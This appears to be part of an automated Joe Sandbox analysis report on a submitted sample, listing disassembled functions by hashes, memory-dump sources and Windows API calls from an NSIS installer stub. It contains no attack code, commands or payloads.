                                                                                                            • Opcode ID: 0933b404a74bdb7f2451df401edde381536188366a1d1ff8e5dd406c0aaec47c
                                                                                                            • Instruction ID: e76609449f8f6e4ab60f9ddb5156b92c28fd7ed95229d1a0300bf4fd2ac0e8a8
                                                                                                            • Opcode Fuzzy Hash: 0933b404a74bdb7f2451df401edde381536188366a1d1ff8e5dd406c0aaec47c
                                                                                                            • Instruction Fuzzy Hash: 9DF0A0613143055BE20472A98855B2F629E9FC5691B154A36E501DA240DEE1EC4607F2
                                                                                                            Function 35F2D4C9 Relevance: .0, Instructions: 34COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c7779dafbba4da8f9a94c73fff1ded65b4fb0d58e9fcb33e754c42f19dcda4df
                                                                                                            • Instruction ID: 569eb738a4e4aa1fdbee1f3d575254b5b70afc7c2a8e6d822d1d39082628c8b1
                                                                                                            • Opcode Fuzzy Hash: c7779dafbba4da8f9a94c73fff1ded65b4fb0d58e9fcb33e754c42f19dcda4df
                                                                                                            • Instruction Fuzzy Hash: E5F0E5613243092BE200627D8811B7B679EDFC56A0F15463AE501EB254DEE5ED4203F1
                                                                                                            Function 000DB168 Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2a3eab610270aa88ab2a6534a918745860d34bf13bd0fec3b58bd04bceb0bd81
                                                                                                            • Instruction ID: 3e0febae4678f27c2f5b9e1b8bafe004874f5d94d85383085fe228b4b0c27e6f
                                                                                                            • Opcode Fuzzy Hash: 2a3eab610270aa88ab2a6534a918745860d34bf13bd0fec3b58bd04bceb0bd81
                                                                                                            • Instruction Fuzzy Hash: 67E09935822F02DBF3402B70ACBC33A7AB5FB0B313B806C00A00E820329B785444CA14
                                                                                                            Function 000D1877 Relevance: .0, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b90d5870870e0a4fa73aea033ecebb889a7ce5485dd13e23fdc6fb743785af61
                                                                                                            • Instruction ID: e5b83dec97e11c67fbc94cd6f2190907e5f1656323863142212f1afd446b964f
                                                                                                            • Opcode Fuzzy Hash: b90d5870870e0a4fa73aea033ecebb889a7ce5485dd13e23fdc6fb743785af61
                                                                                                            • Instruction Fuzzy Hash: F8E09A319113668ECB029FB4D8040EEBB30EE83310B1242A7D050BB050FB301A5ECB62
                                                                                                            Function 35F2BD98 Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e1d1f9a8583ed41eb96d4be606b088896bc096a00779944bd49438b835697ae
                                                                                                            • Instruction ID: b03a0496122e7537162badfac2d15440278745f09f77eaa19dca882f27305302
                                                                                                            • Opcode Fuzzy Hash: 4e1d1f9a8583ed41eb96d4be606b088896bc096a00779944bd49438b835697ae
                                                                                                            • Instruction Fuzzy Hash: CCE04630424F02DFE3402F60ACAC2AABB74FB0B307BC42D04E90E420328B3C0400CA45
                                                                                                            Function 000DFE1B Relevance: .0, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c4aeffc451c94e744aac0e9a87337be88c393f46bfd417fd5a3ef162eca41b8
                                                                                                            • Instruction ID: 6929faecdff88bb0c3ff640ec8fd7f08f2cc4265d985de722acea8d6f6b93f6d
                                                                                                            • Opcode Fuzzy Hash: 0c4aeffc451c94e744aac0e9a87337be88c393f46bfd417fd5a3ef162eca41b8
                                                                                                            • Instruction Fuzzy Hash: CAF03934D05208EFDB54DFB8D5496ACBFF1EB4D305F6091AAC815A3321DB314A55CB40
                                                                                                            Function 000DFE20 Relevance: .0, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1b1561e9fea3437abaa32de5080eebffd754e4a7e5e280af340263c615bc29ef
                                                                                                            • Instruction ID: d0e7e20e121fe2e207723d5f7250f1c1a305e6ff0b320b955c416e3d133748c1
                                                                                                            • Opcode Fuzzy Hash: 1b1561e9fea3437abaa32de5080eebffd754e4a7e5e280af340263c615bc29ef
                                                                                                            • Instruction Fuzzy Hash: 00E06D34D04308EBDB44DFB8D40869CBBF5AB49305F6080AA8805A3351D7304A41CB40
                                                                                                            Function 000DFF22 Relevance: .0, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d09b7763e3a96e49158dd27dd2cc88076bceaae595454e7138920b65b9b26073
                                                                                                            • Instruction ID: 87691b3267c9eeaef76ce105dc5fb7e0e8e61bd62bda3e5b8092d2b8c33dc9cc
                                                                                                            • Opcode Fuzzy Hash: d09b7763e3a96e49158dd27dd2cc88076bceaae595454e7138920b65b9b26073
                                                                                                            • Instruction Fuzzy Hash: A9E0C2B1D49386AFC742ABB09811AF9BB749B47201F1490DAC805A32A2E7310E15CB91
                                                                                                            Function 000D1888 Relevance: .0, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 73b849b8ebe63f2745b0bdbf7b7bba1a445fbdcd9253f8b4ebf26034a4d77b2e
                                                                                                            • Instruction ID: ac98e7625b2ebce1ec81c06edea230603dc0bd49fb265d9c92e8d628263e3ddd
                                                                                                            • Opcode Fuzzy Hash: 73b849b8ebe63f2745b0bdbf7b7bba1a445fbdcd9253f8b4ebf26034a4d77b2e
                                                                                                            • Instruction Fuzzy Hash: 70D05B31D2032A57CB10E7A5DC044DFFB38EED5321B514626D55437144FB706659C6E5
                                                                                                            Function 000D7EC0 Relevance: .0, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                            • Instruction ID: 6bfe9e4ddc3703fabb27178ed1c8188bd7b056dc6bdeb01e91e2ebab0192cb7f
                                                                                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                            • Instruction Fuzzy Hash: 0AC08C3320C2282AA234108FBC40EA7BB8CC3C53B4E31017BF92CC3300A8429C8011F5
                                                                                                            Function 000D56FF Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1d7ad67907d63b6c10fd7065de1d77dad18e54ea812980f2f51ed73e626705ae
                                                                                                            • Instruction ID: b13f08ed7ab22bf8d2c6d00c8c04d6e20cb57c672563a658588ea936b0023668
                                                                                                            • Opcode Fuzzy Hash: 1d7ad67907d63b6c10fd7065de1d77dad18e54ea812980f2f51ed73e626705ae
                                                                                                            • Instruction Fuzzy Hash: D5E072324083C18FC702EB30CC551C87F369FE0200B048264C0061A16BDEBB8182CF22
                                                                                                            Function 000D9F6D Relevance: .0, Instructions: 16COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bc37467523e1590c88a673899b39074263f815415a9310f3161303423fb41ff5
                                                                                                            • Instruction ID: 17bdefe3146418b1c5b8d3696be5099e21965894bba40d0c5943612a2324a7a7
                                                                                                            • Opcode Fuzzy Hash: bc37467523e1590c88a673899b39074263f815415a9310f3161303423fb41ff5
                                                                                                            • Instruction Fuzzy Hash: 8CD0673BB00008DFDB149F98EC409DDF776FB98261B448116F915A3660C6319965DB54
                                                                                                            Function 35F2D49D Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 44ef042d93643b482f20dcee0ba8ef658943debee931b7a99810bdb52d204942
                                                                                                            • Instruction ID: ec81d57848d22a87140cb1b58e02396b7384d8b8e4d438d2dfb2a46fbb79b146
                                                                                                            • Opcode Fuzzy Hash: 44ef042d93643b482f20dcee0ba8ef658943debee931b7a99810bdb52d204942
                                                                                                            • Instruction Fuzzy Hash: EBD05E36208AD14FD317C635A8205CAFBB15E8921074983A6C0488B6568A94AA8A87DA
                                                                                                            Function 35F2CF31 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 80881ac3feed98b3e6887c5b5f8fe8659c69f0f0fd92114b6d9dc74fc205f2e6
                                                                                                            • Instruction ID: 7ca47247aadea80580f6b83d2c276e23d64bf32d24a7adb711deb01cf30d79c8
                                                                                                            • Opcode Fuzzy Hash: 80881ac3feed98b3e6887c5b5f8fe8659c69f0f0fd92114b6d9dc74fc205f2e6
                                                                                                            • Instruction Fuzzy Hash: 3DC012301205048BD7004518D44078D7358EB44704F6014B0E50587A32C129FC008D44
                                                                                                            Function 35F2961C Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 732ee91a139add515044cdd1ae152ba4d0016bb50548ad2ef00966c4c0fdf279
                                                                                                            • Instruction ID: 20ab22bd14c79147ac037facae92df238038ce2aa2c1e4b4d158936b244c7945
                                                                                                            • Opcode Fuzzy Hash: 732ee91a139add515044cdd1ae152ba4d0016bb50548ad2ef00966c4c0fdf279
                                                                                                            • Instruction Fuzzy Hash: 0CC012763156900B9714921C745468EA7A59DC5610321DF26A005971044DD4E986429A
                                                                                                            Function 000DFF30 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 339839e706b2d3b7ea5afc69145012e68ca6b11b30603936337c4b436f88b8e7
                                                                                                            • Instruction ID: 0046136585e296c90e7df4328054eaef904b55723f28b52a685d23e32a13275b
                                                                                                            • Opcode Fuzzy Hash: 339839e706b2d3b7ea5afc69145012e68ca6b11b30603936337c4b436f88b8e7
                                                                                                            • Instruction Fuzzy Hash: AED0A930C01209ABC380EBA0D805BAAF3BCEB03202F0090A89808232508B700E00C698
                                                                                                            Function 35F2BD48 Relevance: .0, Instructions: 13COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fb91e867c4758f56321ce61997dc570502a8bb014e07d3d5ecf52947cad3f3aa
                                                                                                            • Instruction ID: 91512fb79ca7f3dc19968df473162026a9329a2f5e9b3a2b06b8b711bb3adc8d
                                                                                                            • Opcode Fuzzy Hash: fb91e867c4758f56321ce61997dc570502a8bb014e07d3d5ecf52947cad3f3aa
                                                                                                            • Instruction Fuzzy Hash: 9CC012B8408E0A8BE2042B90AC0CB79B2A8B707303FC82D10AA09028718BB844148648
                                                                                                            Function 35F29544 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 099c710f82c076246fa178af743f728a52d33840a15e33b0610216df453041d8
                                                                                                            • Instruction ID: d34a463fcaa2a8db39cea9cbe67b8995f32e94f8da64a22fd2257729a905f413
                                                                                                            • Opcode Fuzzy Hash: 099c710f82c076246fa178af743f728a52d33840a15e33b0610216df453041d8
                                                                                                            • Instruction Fuzzy Hash: 3BC08C302683088FE3009A1DC884B1533ACEF85B04F0058E0F2088BA22CAA2FC008646
                                                                                                            Function 000D5710 Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 41c095adc7a746472e484b577cf72db65b3545353e9008526e48f7143bd49d4e
                                                                                                            • Instruction ID: 8f922379d3060f8211af07c2e8358f9159780eca374f8e753bc81fdb164dc4d0
                                                                                                            • Opcode Fuzzy Hash: 41c095adc7a746472e484b577cf72db65b3545353e9008526e48f7143bd49d4e
                                                                                                            • Instruction Fuzzy Hash: 0BC012314003044FD641E765DC49659776AD7C4500740C610E00A1957B9EF599865E95
                                                                                                            Function 000DFFC8 Relevance: .0, Instructions: 4COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 63298bb74ed1eb7a01fd1363e5d12ddbd3e24b043113746791f285424671552f
                                                                                                            • Instruction ID: 0822834fbe18465116d56bc6d45179d2c147a6436e98bacbdee94ab1362ffbee
                                                                                                            • Opcode Fuzzy Hash: 63298bb74ed1eb7a01fd1363e5d12ddbd3e24b043113746791f285424671552f
                                                                                                            • Instruction Fuzzy Hash: 93A0223B30820083C208EB08E000E2FE3832FE0B08B00C02C8000028A88830CC008022

                                                                                                            Non-executed Functions

                                                                                                            Function 00404B10 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                            • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                            • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                            • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                            • Opcode Fuzzy Hash: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                            • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                                                            Function 0040335A Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 335stringfilecomCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • #17.COMCTL32 ref: 00403379
                                                                                                            • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                              • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                              • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                              • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                              • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                            • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                            • CharNextW.USER32(00000000,00434000,00000020), ref: 00403402
                                                                                                            • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 0040350B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351C
                                                                                                            • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403528
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353C
                                                                                                            • lstrcatW.KERNEL32(00436800,Low), ref: 00403544
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403555
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355D
                                                                                                            • DeleteFileW.KERNEL32(00436000), ref: 00403571
                                                                                                            • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                            • ExitProcess.KERNEL32 ref: 00403641
                                                                                                            • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364D
                                                                                                            • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403659
                                                                                                            • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403665
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366C
                                                                                                            • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                            • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036DA
                                                                                                            • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                            • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                            • API String ID: 4107622049-1875889550
                                                                                                            • Opcode ID: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                            • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                            • Opcode Fuzzy Hash: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                            • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                                                            Function 00405772 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,00436800,774D2EE0,00434000), ref: 0040579B
                                                                                                            • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,774D2EE0,00434000), ref: 004057E3
                                                                                                            • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,774D2EE0,00434000), ref: 00405806
